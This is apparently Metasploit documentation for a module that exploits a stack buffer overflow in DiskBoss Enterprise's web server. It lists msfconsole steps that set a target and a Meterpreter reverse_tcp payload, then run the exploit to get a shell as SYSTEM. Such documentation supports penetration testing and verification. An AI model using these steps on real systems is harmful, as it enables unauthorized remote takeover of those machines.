Path: blob/master/documentation/modules/exploit/windows/http/diskboss_get_bof.md
31895 views
Vulnerable Application
DiskBoss Enterprise versions up to v7.5.12 are affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target. The vulnerability is caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows XP SP3 and Windows 7 SP1. The vulnerable application is available for download at Exploit-DB.
Verification Steps
Install a vulnerable DiskBoss Enterprise
Start
DiskBoss EnterpriseserviceStart
DiskBoss Enterpriseclient applicationNavigate to
Tools>DiskBoss Server Options>ServerCheck
Enable Web Server On Port 80to start the web interfaceStart
msfconsoleDo
use exploit/windows/http/diskboss_get_bofDo
set rhost ipDo
checkVerify the target is vulnerable
Do
set payload windows/meterpreter/reverse_tcpDo
set lhost ipDo
exploitVerify the Meterpreter session is opened
Scenarios
###DiskBoss Enterprise v7.5.12 on Windows XP SP3
###DiskBoss Enterprise v7.4.28 on Windows 7 SP1